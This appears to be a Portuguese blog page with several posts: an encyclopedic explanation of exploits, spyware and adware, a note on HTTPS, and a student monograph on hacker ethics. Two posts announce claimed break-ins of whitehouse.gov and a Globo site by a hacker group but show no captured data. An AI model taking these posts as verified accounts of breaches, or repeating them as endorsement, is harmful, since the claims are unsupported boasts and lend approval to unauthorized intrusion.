    Um exploit, em segurança da informação, é um programa de computador, uma porção de dados ou uma sequência de comandos que se aproveita das vulnerabilidades de um sistema computacional – como o próprio sistema operativo ou serviços de interação de protocolos (ex: servidores Web). São geralmente elaborados por hackers como programas de demonstração das vulnerabilidades, a fim de que as falhas sejam corrigidas, ou por crackers a fim de ganhar acesso não autorizado a sistemas. Por isso muitos crackers não publicam seus exploits, conhecidos como 0days, e o seu uso massificado deve-se aos script kiddies.

    Até meados dos anos 1990, acreditava-se que os exploits exploravam exclusivamente problemas em aplicações e serviços para plataformas Unix. A partir do final da década, especialistas demonstraram a capacidade de explorar vulnerabilidades em plataformas de uso massivo, por exemplo, sistemas operacionais Win32 (Windows 9x, NT, 2000 e XP). Como exemplo temos o CodeRed, o MyDoom, o Sasser em 2004 e o Zotob em 2005.
    Como atua

    Para um exploit atacar, o sistema precisa ter uma vulnerabilidade, ou seja, um meio de comunicação com a rede que possa ser usado para entrar, uma porta ou um console.

    Um exploit muito usado é no sistema RPC do Windows:

    o usuário localiza a porta e envia à porta RPC uma sequência de bytes, que são interpretados como dados pelo servidor
    quando são recebidos, estes dados deixam propositadamente o sistema em pane
    o sistema passa o controle a estes próprios dados que então são uma sequência de ordem para dominar a CPU.

    Desta forma esta sequência de informações toma conta do PC e abre-o para o hacker que aguarda na outra ponta.

    No sistema Linux, quando existem vulnerabilidades, sempre são publicadas, como já houve no sistema Apache, Samba ou MySQL, que também apresentam vulnerabilidades e possibilita o controle do PC por um hacker remoto.

    segunda-feira, 17 de dezembro de 2012

    Informativo invasão www.whitehouse.gov, grupo Cyb3rGh0sts

    Informativo 


    Informativo invasão www.whitehouse.gov, grupo Cyb3rGh0sts




    Grupo de hacker invadem servidores:

    www.whitehouse.gov

    Nome do grupo: Cyb3rGh0sts

    By: Crlo Lvd & Syztem Schmelzer
    Cyb3rGh0sts & AnonCyber

    INFORMAÇÕES CAPTURADAS

    Momento Wikipédia o que é Spyware ?



    Spyware consiste em um programa automático de computador, que recolhe informações sobre o usuário, sobre os seus costumes na Internet e transmite essa informação a uma entidade externa na Internet, sem o seu conhecimento nem o seu consentimento.
    Diferem dos cavalos de Tróia por não terem como objetivo que o sistema do usuário seja dominado, seja manipulado, por uma entidade externa, por um cracker.
    Os spywares podem ser desenvolvidos por firmas comerciais, que desejam monitorar o hábito dos usuários para avaliar seus costumes e vender este dados pela internet. Desta forma, estas firmas costumam produzir inúmeras variantes de seus programas-espiões, aperfeiçoando-o, dificultando em muito a sua remoção.
    Por outro lado, muitos vírus transportam spywares, que visam roubar certos dados confidenciais dos usuários. Roubam dados bancários, montam e enviam registros das atividades do usuário, roubam determinados arquivos ou outros documentos pessoais.
    Com frequência, os spywares costumavam vir legalmente embutidos em algum programa que fosse shareware ou freeware. Sua remoção era por vezes, feita quando da compra do software ou de uma versão mais completa e paga.
    Traduzindo ao pé da letra, Spyware significa "aplicativo ou programa espião".

    Adwares

    Muitas vezes usa-se de forma genérica o termo spyware para os malware e adwares, que são programas indesejáveis. Costuma-se incluir os adwares no estudo dos spywares, pois assemelham-se na sua forma de infecção e na sua forma de desinstalação. Seriam como se fossem um sub-grupo dos spywares.
    Os adwares são conhecidos por trazerem na tela do usuário algum tipo de propaganda.
    Como geralmente são firmas comerciais que os desenvolvem, é comum os adwares virem embutidos em diversos programas de livre download (freeware), com a autorização de seus autores.
    O Kazaa oficial é um programa de compartilhamento de arquivos, sendo um exemplo do casamento de um software gratuito com adwares, pois estes lhe proporcionam uma fonte de renda.
    Inicialmente os adwares procuravam exibir propagandas em janelas, chamados de banners, pequenas janelas de propagandas, embutidas em softwares de terceiros. Caso o usuário gostasse deste software, poderia adquirir uma versão mais avançada, paga, livre destas propagandas.
    Posteriormente os adwares passaram a monitorar a atividade do usuário na internet, podendo desta forma mostrar propagandas personalizadas, além de enviar dados sobre hábitos do usuário a certos sites, tendo então funções de spyware e adware, de forma simultânea.
    Mais adiante certos adwares passaram a exibir janela do tipo pop-up, pequena janela de propaganda solta pela tela, em vez de banners.
    Um pouco mais a frente os adwares passaram a se instalar no navegador do usuário, acrescentando certas funcionalidades duvidosas, principalmente no Internet Explorer. Avanços (ou upgrades) no Internet Explorer, passaram a exigir o consentimento do usuário para a sua instalação.
    Porém com o passar do tempo, os adwares sofisticaram-se, incluindo propagandas persistentes, com inúmeras variantes, onde a sua desinstalação passou a ser um tarefa bastante penosa ou mesmo impossível, sem uma ajuda externa. A insistência no aparecimento das propagandas e sua difícil desinstalação, levaram os usuários a classificá-los como pragas ou spywares e não mais como simples adwares.
    Certos adwares passaram a ser instalados no Internet Explorer, quando o usuário navegava em sites maliciosos.
    Os adwares se sofisticaram, tornaram-se pragas. Produzem alterações no registro do Windows e depois somem ou se escondem para garantir que as alterações não sejam desfeitas, exigindo então não mais a ação de um antivírus ou de um simples anti-spyware, mas sim de um programa específico de conserto do registro.
    Por vezes os adwares exibem propagandas pornográficas, falsas propagandas de infecção do sistema por vírus, falsa propaganda de venda de produtos e passaram também a causar instabilidade no sistema, principalmente no navegador.
    Suspeita-se que possam tornar o sistema do usuário aberto a ação de crackers,devido a falta de maiores cuidados na elaboração dos adwares.
    Sua data de descoberta é desconhecida.

    sexta-feira, 14 de dezembro de 2012

    Informativo invasão megaminas.globo.com, grupo Cyb3rGh0sts

    Informativo 





    Grupo de hacker invadem servidores:

    megaminas.globo.com

    Nome do grupo: Cyb3rGh0sts

    By: Crlo Lvd & Syztem Schmelzer
    Cyb3rGh0sts & AnonCyber

    INFORMAÇÕES CAPTURADAS

    A DIFERENÇA ENTRE "http://"; e “https://”


    A DIFERENÇA ENTRE "http://"; e “https://”


    A DIFERENÇA ENTRE "http://"; e “https://”
    Pois é, a diferença existe e é simplesmente a sua segurança!

    O "s" = secure = segurança.
    A sigla http quer dizer "Hyper Text Transport Protocol", que é a linguagem para troca de informação entre servidores e clientes da rede.

    O que é importante, e o que marca a diferença, é a letra "s" que é a abreviatura de "Secure"! O “s” indica que os dados inseridos serão criptografados e não poderão ser interceptados.

    Ao visitar uma página na web, observe se começa por: http://./ Isto significa que essa página se comunica numa linguagem normal, mas sem segurança!

    ATENÇÃO = Não se deve dar o número do cartão de crédito através de uma página/site começada APENAS por http:// . Se começar por https:// , significa que o computador está conectado a uma página que se corresponde numa linguagem codificada e segura.

    quarta-feira, 12 de dezembro de 2012

    Hackers: A ética por trás do folclore

    Hackers: A ética por trás do folclore

    Hackers: A ética por trás do folclore

    Monografia do curso de Segurança de Dados 1/02

    Fabrício César Ferreira Anastácio *
    Departamento de Ciência da Computação
    Universidade de Brasília
    Setembro de 2002

    Com o crescimento da Internet e a consolidação da chamada Sociedade da Informação muito tem sido dito sobre os tais dos "hackers". "Piratas da Rede", "meliantes digitais" e outras denominações que variam do ridículo ao romantismo cibernético contribuem para a criação de uma atmosfera mítica coberta de mistério e, certamente, equívocos em torno destes personagens. É comum deparar-se na mídia com este termo sendo usado num sentido bastante pejorativo, conotando indissociável relação com o crime e a ilegalidade. Seja nos filmes de Hollywood ou no jornal cotidiano, os hackers usam seu profundo conhecimento do funcionamento dos computadores e das redes de comunicações para perpetrarem sofisticados delitos, causando danos a terceiros e/ou enriquecendo num digitar de teclas. Colocando o sensacionalismo e a extravagância de lado, isto tudo poderia estar correto exceto pelo fato de que os agentes de atividades desta estirpe não são hackers, mas sim "crackers".
    Esta confusão não é apenas um erro de tradução, como afirma Rezende em [1], já que ocorre mesmo em sua língua original, observando-se isso claramente na reportagem de popular, ainda que não muito confiável, órgão de impressa norte-americano referenciada pelo próprio texto citado. Na verdade, segundo Pekka Himanen (foto), filósofo finlandês, em [2], a origem deste equívoco remontaria a meados dos anos 80, quando surgiram os primeiros crimes computacionais, e a mídia, não sabendo como designar tais criminosos, aplicou o termo de forma um tanto infeliz.
    Ora, se não são os tais meliantes digitais, afinal, quem são os hackers?
    A tradução literal da palavra poderia ser algo como talhador, lenhador, o que não deixa de ter alguma relação com o sentido originalmente concebido. Este sentido surgiu no início dos anos 60 no MIT, sendo usado como autodenominação por um grupo de programadores apaixonados por sua atividade. Com uma certa boa vontade, pode-se imaginá-los como "lapidários" de código escrito em linguagens de programação. Deixando-se tomar pela analogia inspiradora feita por Rezende em [1], se uma linguagem de programação puder ser comparada a uma linguagem natural, sendo o código-fonte comparado a um texto, um programa a um livro e um programador a um escritor, um hacker seria um poeta desta literatura.

    Um hacker é uma pessoa para quem a programação é uma paixão e que compartilha os frutos de sua paixão com os outros, é um título honorário, como reforça Himanen em uma entrevista em [3]. Não é um criminoso de computador. Em [2], Himanen traz o que seria a definição de hacker compilada pelos próprios: "uma pessoa que programa entusiasticamente e que acredita que compartilhar informação é um poderoso bem concreto e que seja um dever moral compartilhar a sua perícia escrevendo software livre e facilitando o acesso a informação e a recursos computacionais onde for possível", é alguém que "acha programar intrinsecamente interessante, empolgante e divertido" [2].
    Um outro ponto destacado pelo filósofo finlandês é que um hacker não está limitado ao mundo da informática. Praticamente, em qualquer área de atividade humana, podem ser encontrados hackers. Eles seriam "experts" ou entusiastas de qualquer tipo. Pode haver "hacker carpinteiro", "hacker jornalista", "hacker gerente", "hacker astrônomo" ou hacker qualquer outra coisa. Em suma, "uma pessoa é hacker quando é apaixonada pelo que faz e quer se realizar naquele trabalho" [3].
    No entanto, esta definição ainda não é muito conhecida ou difundida nos meios "formadores de opinião". Pior é quando, mesmo sendo conhecida, ela é deliberadamente ignorada em prol de uma suposta simplicidade destinada a "facilitar" o entendimento por parte do leitor/espectador leigo. Como se não bastasse a argumentação absurda e contraditória de justificar a criação de confusão para elucidar a compreensão, este recorrente engano tem significativas conseqüências. Além de dificultar a correta assimilação de conceitos e dinâmicas da comunidade da Rede, isto mistura meros utilizadores mal-intencionados (ou, por vezes, apenas curiosos demais) de ferramentas prontas disponíveis aos montes na Internet, os chamados "script kiddies", com os verdadeiros crackers (que podem ocasionalmente ser hackers).

    Estes crackers é que são os responsáveis pelos verdadeiros crimes. São eles que dão volumosas cifras de prejuízo a empresas e governos e, muitas vezes, agem amparados por quadrilhas altamente especializadas. Assim, ao colocar estas "tribos" totalmente diferentes em condição de igualdade, a mídia acaba encobrindo a complexidade do sério problema de segurança aí existente e dificulta sobremaneira o esclarecimento de quem são os reais responsáveis por ele, sendo crassamente injusta.
    Injustiça esta que se torna ainda mais evidente diante da elucidação das contribuições fundamentais dadas pelo hackers para o embasamento tecnológico da sociedade emergente. Como destacado por Himanen em [2], alguns dos símbolos mais conhecidos dos tempos atuais - a Internet, o computador pessoal e softwares como o sistema operacional Linux - foram criados primordialmente por alguns entusiásticos indivíduos que começaram a concretizar suas idéias com outros de pensamento semelhante, trabalhando em um ritmo livre. Rezende, em [1], compara a atuação dos hackers em relação ao software com a ação da seleção natural na evolução das espécies naturais. Eles seriam uma forma de agentes seletores, que garantiriam a sobrevivência dos mais aptos, descobrindo vulnerabilidades e falhas de segurança nos softwares em uso e reportando os problemas encontrados aos respectivos desenvolvedores, chegando mesmo a sugerir soluções e correções.
    Rezende destaca que, por vezes, para amenizar o erro de designação, tais indivíduos são chamados de "hackers éticos". No entanto, isto só piora a confusão, pois reforça a idéia de que o hacker por natureza não é ético. Tal suposição não poderia ser mais difamatória, pois não apenas o hacker é ético em sua natureza original, mas se pode até mesmo falar de toda uma "Ética Hacker".
    Para entender melhor esta ética, é necessário antes conhecer melhor o contexto histórico e social no qual ela surge. O pensamento ainda predominante na sociedade atual e que marcou distintamente toda a Era Industrial, de acordo com Himanen, é o que Max Weber chamou de "Ética de Trabalho Protestante" em sua obra The Protestant Ethic and the Spirit of Capitalism (1904-1905). Esta ética baseia-se fortemente na idéia de que o trabalho é a coisa mais importante na existência de uma pessoa. É ele que dá sentido à vida. O trabalho é visto como um fim em si mesmo. Não importa no que ele consista, ele deve ser feito da melhor maneira possível, sem questionamento ou lamúrias. É uma questão de consciência, é como um "chamado" divino.
    Este ponto de vista só encontra precursores na vida monástica, a qual sempre pregou que "o ócio é o inimigo da alma", e contrasta fortemente com a visão geral predominante antes do século XVI. Mesmo a Igreja considerava o trabalho (especialmente o mais árduo) como uma espécie de punição. No dia santo, o domingo, no qual até mesmo o próprio Deus descansou, não se devia trabalhar. O Céu era um lugar onde, assim como no domingo, ninguém precisava trabalhar. Enquanto que, no Inferno, os pecadores são condenados a trabalhos eternos e inúteis, um terrível sofrimento, como Dante Alighieri muitas vezes mostra no seu clássico A Divina Comédia do século XIV. Pode-se dizer que, nessa época, o propósito da vida era o domingo.
    O que a ética de trabalho protestante faz é inverter este paradigma, deslocando o propósito da vida para a sexta-feira. O trabalho deixa de ser uma punição e passa a ser uma bênção. Isto é um movimento tão radical que se pode dizer que o Céu e o Inferno trocaram de lugar. Sísifo, que na mitologia grega tentou enganar os deuses e foi punido com o fardo de empurrar eternamente uma grande rocha até ao cume de uma montanha muito íngreme e, quando ele estava preste a chegar com ela ao topo, a rocha caía, tornou-se um herói, como ilustrado por Himanen [2].

    Esta reviravolta de pensamento e principalmente na forma de se encarar o trabalho caiu como uma luva para o desenvolvimento do então nascente capitalismo. Esta justificativa de origem religiosa foi rapidamente tomada e incorporada por ele, que logo a separou da religião e imprimiu seus próprios mecanismos. Com isso, passou-se a poder falar em ética protestante independentemente de fé ou cultura. Este fato foi a base que permitiu o florescimento da Era Industrial, na qual os trabalhos eram árduos e enfadonhos, mas era necessário que alguém os fizesse, fosse na Europa ou no Japão.
    Com o fim da Era Industrial e a consolidação do que está sendo designado como Era da Informação, é natural que se espere o surgimento de um novo pensamento que questione estes valores vigentes, mesmo que o capitalismo ainda tenha chegado a este ponto com considerável força. Força esta que pode ser vista na formação da "nova economia" que, embora envolva significantes diferenças na sociedade em rede com relação à anterior industrial, é meramente uma nova forma de capitalismo. É justamente neste cenário que emerge o que foi chamado anteriormente de ética hacker.
    De acordo com Himanen, a ética hacker, que deve ser entendida abrangendo todas as áreas de atividade humana e não apenas a computação, é uma nova ética de trabalho que questiona a ética protestante e propõe um espírito alternativo para a sociedade em rede. Embora seja mais próxima da ética de trabalho pré-protestante, ela não concebe este como sendo um castigo e não descreve o paraíso como sendo um lugar onde não se faz coisa alguma. Na visão do hacker, o sentido da vida está em dedicar-se a uma paixão. Esta paixão é, na realidade, uma atividade significativa, inspiradora e prazerosa para o indivíduo, seja ela rotulada como "trabalho" ou como "diversão".

    No entanto, a sua realização nem sempre é apenas prazer e alegria, podendo envolver aspectos menos interessantes e apaixonantes e mesmo muito trabalho duro e tedioso. Ainda assim, o hacker está disposto a realizar este esforço em prol de algo que considera maior. A significação do todo faz valer a pena qualquer esforço despendido na execução de suas partes menos atraentes. Além disso, é bem diferente ter de fazer partes menos prazerosas ao realizar uma paixão do que ter de se sujeitar permanentemente a um trabalho desagradável.
    Um outro aspecto da ética hacker é uma visão fortemente diferente do dinheiro com relação à vigente na sociedade capitalista, na qual este é o maior e mais valorizado bem. Para o hacker, o dinheiro é uma questão secundária. Não é um objetivo de vida nem a razão do seu trabalho. Ele não é o propósito de uma ação. Assim, um hacker "pode se satisfazer com menos riqueza material ao perceber que sua verdadeira paixão deu uma contribuição para os outros" [3] ou para a sociedade de um modo geral.
    Aliás, esta motivação social também é um fator importante nesta nova ética. A realização da paixão hacker está intimamente ligada com alguma espécie de colaboração na construção de um bem maior para a sociedade. Isto poderia ser visto até como uma influência meio hippie, anos 60, do tipo "vamos construir um mundo melhor", mas tem uma importância fundamental para a estruturação de toda esta ideologia.
    Talvez esteja no "hackerismo" o melhor exemplo do lado positivo da globalização, entendendo-se "hackerismo" como um grupo de indivíduos realizando suas paixões juntos e fora das estruturas de corporações ou governos. Não importa a nacionalidade, cor, raça das outras pessoas. O que importa é que elas estão juntas, provavelmente por meio da Internet, para fazer coisas que acham interessantes e construtivas.
    Obviamente, um movimento que se propõe a questionar o modelo corrente não poderia passar sem causar desconforto naqueles que estão bem estabelecidos e confortáveis beneficiando-se do status quo. Pode-se especular, então, que esta "onda difamatória" [1] que causa esta confusão toda na cabeça do cidadão comum tenha origem nos "interesses da indústria de software proprietário, procurando minar a confiabilidade pública no software livre" [1], como sugere Rezende. Seguindo por estes caminhos, também não se pode descartar a possibilidade de conluio ou mesmo de manipulação da mídia, visando a proteção desta mesma indústria, a qual, por sinal, é consideravelmente rica.
    No entanto, uma possível suplantação da ética de trabalho protestante não é uma coisa que poderia acontecer de uma hora para a outra, lembra Himanen. Tal evento seria uma grande mudança cultural e este tipo de coisa demanda muito tempo para se completar. Principalmente, porque "a ética protestante está tão profundamente enraizada na nossa consciência atual que ela é freqüentemente pensada como se fosse simplesmente da 'natureza humana'. Obviamente, não é" [2], como pode ser visto no decorrer da História.
    Enquanto isso, para amenizar os efeitos da confusão feita pela mídia com relação ao termo hacker, Rezende sugere em [1] a cunhagem de uma nova palavra para designar esta comunidade, já que não se tem muito controle sobre a evolução de uma língua (como ele diz, "o uso faz o idioma"). O termo que ele relata ter sido escolhido pelos verdadeiros hackers para se autodenominarem é "geek". Porém, talvez este não tenha em si, pelo menos ainda não, toda a semântica e história que há por trás do original, deixando uma sensação de inacurácia e de que algo está faltando. Por outro lado, também não carrega toda a contaminação que foi infringida ao termo original nas últimas décadas.
    Na verdade, a melhor solução para esta confusão seria a fortificação da ideologia hacker, tornando-a clara e conhecida por todos, o que a deixaria menos vulnerável a falácias nominais. Mesmo que isso possa se chocar com os interesses de classes atualmente dominantes. É possível que, conforme a sociedade da informação vá seguindo o seu caminho e vá amadurecendo, as próprias necessidades naturais, que inevitavelmente aparecem, encarreguem-se de implantar esta nova ética de trabalho, a qual, espera-se, possa ser ao menos um pouco melhor do que a atual.

    Referências

    [1] REZENDE, Pedro A. D. Sobre o uso do termo "hacker". In: http://www.cic.unb.br/docentes/pedro/trabs/hackers.htm. Abril, 2000. [2] HIMANEN, Pekka. The Hacker Ethic and the Spirit of the Information Age. Random House, 2001.
    [3] COUTO, Sérgio P. O que pensar dos hackers? In: Revista Geek, Ano III, Número 14. Digerati Editorial. Agosto, 2001.

    * Fabrício César Ferreira Anastácio, Bacharelando em Ciências da Computação da Universidade de Brasília, aluno da disciplina Segurança dos Dados em 1/02

    Fonte:http://www.cic.unb.br/docentes/pedro/trabs/hackers2.htm